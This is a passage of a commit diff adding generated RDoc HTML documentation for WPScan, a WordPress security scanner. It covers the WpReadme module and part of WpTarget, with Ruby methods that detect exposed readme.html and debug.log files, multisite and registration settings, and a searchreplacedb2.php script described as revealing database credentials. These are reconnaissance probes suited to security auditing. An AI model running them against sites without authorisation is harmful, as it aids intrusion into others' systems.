</div><!-- plugins_from_passive_detection-source -->
</div>
</div><!-- plugins_from_passive_detection-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

294
doc/WpReadme.html Normal file
View File

@@ -0,0 +1,294 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Module: WpReadme</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="module">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/modules/wp_readme_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/modules/wp_readme.rb">lib/wpscan/modules/wp_readme.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-has_readme-3F">#has_readme?</a></li>
<li><a href="#method-i-readme_url">#readme_url</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="module">WpReadme</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="has_readme-3F-method" class="method-detail ">
<a name="method-i-has_readme-3F"></a>
<div class="method-heading">
<span class="method-name">has_readme?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Checks to see if the readme.html file exists</p>
<p>This file comes by default in a wordpress installation, and if deleted is
reinstated with an upgrade.</p>
<div class="method-source-code" id="has_readme-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_readme.rb, line 25</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_readme?</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">readme_url</span>())
<span class="ruby-keyword">unless</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">404</span>
<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">%{wordpress}</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- has_readme-3F-source -->
</div>
</div><!-- has_readme-3F-method -->
<div id="readme_url-method" class="method-detail ">
<a name="method-i-readme_url"></a>
<div class="method-heading">
<span class="method-name">readme_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="readme_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/modules/wp_readme.rb, line 33</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">readme_url</span>
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;readme.html&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- readme_url-source -->
</div>
</div><!-- readme_url-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

984
doc/WpTarget.html Normal file
View File

@@ -0,0 +1,984 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: WpTarget</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/wp_target_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wp_target.rb">lib/wpscan/wp_target.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-c-valid_response_codes">::valid_response_codes</a></li>
<li><a href="#method-i-debug_log_url">#debug_log_url</a></li>
<li><a href="#method-i-error_404_hash">#error_404_hash</a></li>
<li><a href="#method-i-has_debug_log-3F">#has_debug_log?</a></li>
<li><a href="#method-i-is_multisite-3F">#is_multisite?</a></li>
<li><a href="#method-i-login_url">#login_url</a></li>
<li><a href="#method-i-registration_enabled-3F">#registration_enabled?</a></li>
<li><a href="#method-i-registration_url">#registration_url</a></li>
<li><a href="#method-i-search_replace_db_2_exists-3F">#search_replace_db_2_exists?</a></li>
<li><a href="#method-i-search_replace_db_2_url">#search_replace_db_2_url</a></li>
<li><a href="#method-i-theme">#theme</a></li>
<li><a href="#method-i-url">#url</a></li>
<li><a href="#method-i-version">#version</a></li>
<li><a href="#method-i-wp_content_dir">#wp_content_dir</a></li>
<li><a href="#method-i-wp_plugins_dir">#wp_plugins_dir</a></li>
<li><a href="#method-i-wp_plugins_dir_exists-3F">#wp_plugins_dir_exists?</a></li>
</ul>
</div>
<!-- Included Modules -->
<div id="includes-section" class="section">
<h3 class="section-header">Included Modules</h3>
<ul class="link-list">
<li><a class="include" href="WebSite.html">WebSite</a></li>
<li><a class="include" href="WpReadme.html">WpReadme</a></li>
<li><a class="include" href="WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a class="include" href="WpConfigBackup.html">WpConfigBackup</a></li>
<li><a class="include" href="WpLoginProtection.html">WpLoginProtection</a></li>
<li><a class="include" href="Malwares.html">Malwares</a></li>
<li><a class="include" href="WpUsernames.html">WpUsernames</a></li>
<li><a class="include" href="WpTimthumbs.html">WpTimthumbs</a></li>
<li><a class="include" href="WpPlugins.html">WpPlugins</a></li>
<li><a class="include" href="WpThemes.html">WpThemes</a></li>
<li><a class="include" href="BruteForce.html">BruteForce</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">WpTarget</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="uri-attribute-method" class="method-detail">
<a name="uri"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">uri</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="verbose-attribute-method" class="method-detail">
<a name="verbose"></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">verbose</span><span
class="attribute-access-type">[R]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(target_url, options = {})</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 36</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">target_url</span>, <span class="ruby-identifier">options</span> = {})
<span class="ruby-ivar">@uri</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-identifier">add_trailing_slash</span>(<span class="ruby-identifier">add_http_protocol</span>(<span class="ruby-identifier">target_url</span>)))
<span class="ruby-ivar">@verbose</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:verbose</span>]
<span class="ruby-ivar">@wp_content_dir</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_content_dir</span>]
<span class="ruby-ivar">@wp_plugins_dir</span> = <span class="ruby-identifier">options</span>[<span class="ruby-value">:wp_plugins_dir</span>]
<span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>(<span class="ruby-identifier">options</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-value">:max_threads</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">options</span>[<span class="ruby-value">:threads</span>]))
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
<div id="valid_response_codes-method" class="method-detail ">
<a name="method-c-valid_response_codes"></a>
<div class="method-heading">
<span class="method-name">valid_response_codes</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Valid HTTP return codes</p>
<div class="method-source-code" id="valid_response_codes-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 76</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">valid_response_codes</span>
[<span class="ruby-value">200</span>, <span class="ruby-value">403</span>, <span class="ruby-value">301</span>, <span class="ruby-value">302</span>, <span class="ruby-value">500</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- valid_response_codes-source -->
</div>
</div><!-- valid_response_codes-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="debug_log_url-method" class="method-detail ">
<a name="method-i-debug_log_url"></a>
<div class="method-heading">
<span class="method-name">debug_log_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="debug_log_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 122</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">debug_log_url</span>
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-node">&quot;#{wp_content_dir()}/debug.log&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- debug_log_url-source -->
</div>
</div><!-- debug_log_url-method -->
<div id="error_404_hash-method" class="method-detail ">
<a name="method-i-error_404_hash"></a>
<div class="method-heading">
<span class="method-name">error_404_hash</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Return the MD5 hash of a 404 page</p>
<div class="method-source-code" id="error_404_hash-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 63</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">error_404_hash</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@error_404_hash</span>
<span class="ruby-identifier">non_existant_page</span> = <span class="ruby-constant">Digest</span><span class="ruby-operator">::</span><span class="ruby-constant">MD5</span>.<span class="ruby-identifier">hexdigest</span>(<span class="ruby-identifier">rand</span>(<span class="ruby-value">9999999999</span>).<span class="ruby-identifier">to_s</span>) <span class="ruby-operator">+</span> <span class="ruby-string">&quot;.html&quot;</span>
<span class="ruby-identifier">response</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-identifier">non_existant_page</span>).<span class="ruby-identifier">to_s</span>)
<span class="ruby-ivar">@error_404_hash</span> = <span class="ruby-constant">Digest</span><span class="ruby-operator">::</span><span class="ruby-constant">MD5</span>.<span class="ruby-identifier">hexdigest</span>(<span class="ruby-identifier">response</span>.<span class="ruby-identifier">body</span>)
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@error_404_hash</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- error_404_hash-source -->
</div>
</div><!-- error_404_hash-method -->
<div id="has_debug_log-3F-method" class="method-detail ">
<a name="method-i-has_debug_log-3F"></a>
<div class="method-heading">
<span class="method-name">has_debug_log?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="has_debug_log-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 116</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">has_debug_log?</span>
<span class="ruby-comment"># We only get the first 700 bytes of the file to avoid loading huge file (like 2Go)</span>
<span class="ruby-identifier">response_body</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">debug_log_url</span>(), <span class="ruby-value">:headers</span> =<span class="ruby-operator">&gt;</span> {<span class="ruby-string">&quot;range&quot;</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-string">&quot;bytes=0-700&quot;</span>}).<span class="ruby-identifier">body</span>
<span class="ruby-identifier">response_body</span>[<span class="ruby-regexp">%{\[[^\]]+\] PHP (?:Warning|Error|Notice):}</span>] <span class="ruby-operator">?</span> <span class="ruby-keyword">true</span> <span class="ruby-operator">:</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- has_debug_log-3F-source -->
</div>
</div><!-- has_debug_log-3F-method -->
<div id="is_multisite-3F-method" class="method-detail ">
<a name="method-i-is_multisite-3F"></a>
<div class="method-heading">
<span class="method-name">is_multisite?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="is_multisite-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 161</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">is_multisite?</span>
<span class="ruby-keyword">unless</span> <span class="ruby-ivar">@multisite</span>
<span class="ruby-comment"># when multi site, there is no redirection or a redirect to the site itself</span>
<span class="ruby-comment"># otherwise redirect to wp-login.php</span>
<span class="ruby-identifier">url</span> = <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;wp-signup.php&quot;</span>)
<span class="ruby-identifier">resp</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">302</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">headers_hash</span>[<span class="ruby-string">&quot;location&quot;</span>] <span class="ruby-operator">=~</span> <span class="ruby-regexp">/wp-login\.php\?action=register/</span>
<span class="ruby-ivar">@multisite</span> = <span class="ruby-keyword">false</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">302</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">headers_hash</span>[<span class="ruby-string">&quot;location&quot;</span>] <span class="ruby-operator">=~</span> <span class="ruby-regexp">/wp-signup\.php/</span>
<span class="ruby-ivar">@multisite</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span>
<span class="ruby-ivar">@multisite</span> = <span class="ruby-keyword">true</span>
<span class="ruby-keyword">else</span>
<span class="ruby-ivar">@multisite</span> = <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@multisite</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- is_multisite-3F-source -->
</div>
</div><!-- is_multisite-3F-method -->
<div id="login_url-method" class="method-detail ">
<a name="method-i-login_url"></a>
<div class="method-heading">
<span class="method-name">login_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="login_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 50</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">login_url</span>
<span class="ruby-identifier">url</span> = <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;wp-login.php&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-comment"># Let's check if the login url is redirected (to https url for example)</span>
<span class="ruby-identifier">redirection</span> = <span class="ruby-identifier">redirection</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">redirection</span>
<span class="ruby-identifier">url</span> = <span class="ruby-identifier">redirection</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">url</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- login_url-source -->
</div>
</div><!-- login_url-method -->
<div id="registration_enabled-3F-method" class="method-detail ">
<a name="method-i-registration_enabled-3F"></a>
<div class="method-heading">
<span class="method-name">registration_enabled?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Should check wp-login.php if registration is enabled or not</p>
<div class="method-source-code" id="registration_enabled-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 139</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">registration_enabled?</span>
<span class="ruby-identifier">resp</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">registration_url</span>)
<span class="ruby-comment"># redirect only on non multi sites</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">302</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">headers_hash</span>[<span class="ruby-string">&quot;location&quot;</span>] <span class="ruby-operator">=~</span> <span class="ruby-regexp">/wp-login\.php\?registration=disabled/</span>
<span class="ruby-identifier">enabled</span> = <span class="ruby-keyword">false</span>
<span class="ruby-comment"># multi site registration form</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">body</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/&lt;form id=&quot;setupform&quot; method=&quot;post&quot; action=&quot;[^&quot;]*wp-signup\.php[^&quot;]*&quot;&gt;/</span>
<span class="ruby-identifier">enabled</span> = <span class="ruby-keyword">true</span>
<span class="ruby-comment"># normal registration form</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">body</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/&lt;form name=&quot;registerform&quot; id=&quot;registerform&quot; action=&quot;[^&quot;]*wp-login\.php[^&quot;]*&quot;/</span>
<span class="ruby-identifier">enabled</span> = <span class="ruby-keyword">true</span>
<span class="ruby-comment"># registration disabled</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">enabled</span> = <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">enabled</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- registration_enabled-3F-source -->
</div>
</div><!-- registration_enabled-3F-method -->
<div id="registration_url-method" class="method-detail ">
<a name="method-i-registration_url"></a>
<div class="method-heading">
<span class="method-name">registration_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="registration_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 157</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">registration_url</span>
<span class="ruby-identifier">is_multisite?</span> <span class="ruby-operator">?</span> <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;wp-signup.php&quot;</span>) <span class="ruby-operator">:</span> <span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;wp-login.php?action=register&quot;</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- registration_url-source -->
</div>
</div><!-- registration_url-method -->
<div id="search_replace_db_2_exists-3F-method" class="method-detail ">
<a name="method-i-search_replace_db_2_exists-3F"></a>
<div class="method-heading">
<span class="method-name">search_replace_db_2_exists?</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="search_replace_db_2_exists-3F-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 133</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">search_replace_db_2_exists?</span>
<span class="ruby-identifier">resp</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-identifier">search_replace_db_2_url</span>)
<span class="ruby-identifier">resp</span>.<span class="ruby-identifier">code</span> <span class="ruby-operator">==</span> <span class="ruby-value">200</span> <span class="ruby-operator">&amp;&amp;</span> <span class="ruby-identifier">resp</span>.<span class="ruby-identifier">body</span>[<span class="ruby-regexp">%{by interconnect}</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- search_replace_db_2_exists-3F-source -->
</div>
</div><!-- search_replace_db_2_exists-3F-method -->
<div id="search_replace_db_2_url-method" class="method-detail ">
<a name="method-i-search_replace_db_2_url"></a>
<div class="method-heading">
<span class="method-name">search_replace_db_2_url</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Script for replacing strings in wordpress databases reveals databse
credentials after hitting submit <a
href="http://interconnectit.com/124/search-and-replace-for-wordpress-databases/">interconnectit.com/124/search-and-replace-for-wordpress-databases/</a></p>
<div class="method-source-code" id="search_replace_db_2_url-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wp_target.rb, line 129</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">search_replace_db_2_url</span>
<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">merge</span>(<span class="ruby-string">&quot;searchreplacedb2.php&quot;</span>).<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- search_replace_db_2_url-source -->
</div>
</div><!-- search_replace_db_2_url-method -->
<div id="theme-method" class="method-detail ">
<a name="method-i-theme"></a>
<div class="method-heading">
